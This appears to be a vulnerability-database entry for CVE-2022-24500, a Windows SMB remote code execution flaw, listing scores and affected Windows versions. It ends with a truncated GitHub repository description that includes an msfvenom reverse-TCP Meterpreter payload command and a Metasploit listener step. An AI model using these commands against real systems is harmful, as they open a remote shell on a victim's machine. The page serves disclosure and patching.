6.8
CVSSv2

CVE-2022-24500

Published: 15/04/2022 Updated: 29/06/2023
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 605
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Windows SMB Remote Code Execution Vulnerability

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows server 2008 r2

microsoft windows server 2012 r2

microsoft windows 10 1607

microsoft windows 8.1 -

microsoft windows server 2016 -

microsoft windows 7 -

microsoft windows rt 8.1 -

microsoft windows server 2008

microsoft windows server 2012 -

microsoft windows 10 -

microsoft windows server 2019 -

microsoft windows 10 1809

microsoft windows 10 1909

microsoft windows 10 20h2

microsoft windows server 2016 20h2

microsoft windows 10 21h1

microsoft windows server 2022 -

microsoft windows 11 -

microsoft windows 10 21h2

Github Repositories

CVE-2022-24500 RCE Exploit Windows SMB Remote Code Execution Vulnerability Vulnerability: Windows 7 - Windows 2022 msrcmicrosoftcom/update-guide/vulnerability/CVE-2022-24500 step 1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=1921022105 LPORT=4444 -f raw > shellcodebin step 2 msf5 > use multi/handler msf5 e